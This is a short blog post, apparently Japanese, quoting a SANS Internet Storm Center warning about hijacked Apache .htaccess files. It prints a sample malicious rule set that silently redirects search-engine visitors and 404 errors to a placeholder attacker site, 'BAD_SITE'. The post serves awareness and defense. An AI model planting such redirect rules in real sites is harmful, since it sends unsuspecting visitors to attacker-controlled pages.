Watch that .htaccess File on Your Web Site

“Watch that .htaccess file on your web site”(SANS Internet Storm Center),

In this latest scheme of attacks, attackers are abusing the RewriteEngine feature in Apache web servers.
(snip)
One sample .htaccess file is shown below:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://BAD_SITE/in.html?s=hg [R,L]
Errordocument 404 http://BAD_SITE/in.html?s=hg_err

検索エンジン経由でサイトを訪れる人はそのサイトの見栄えなどについて詳しく(知らない|覚えていない)可能性が高いので，別サイトにリダイレクトされても気がつかない可能性が高いということですか．なかなか，姑息ですね…

[ ADVERTISEMENT | 広告 ]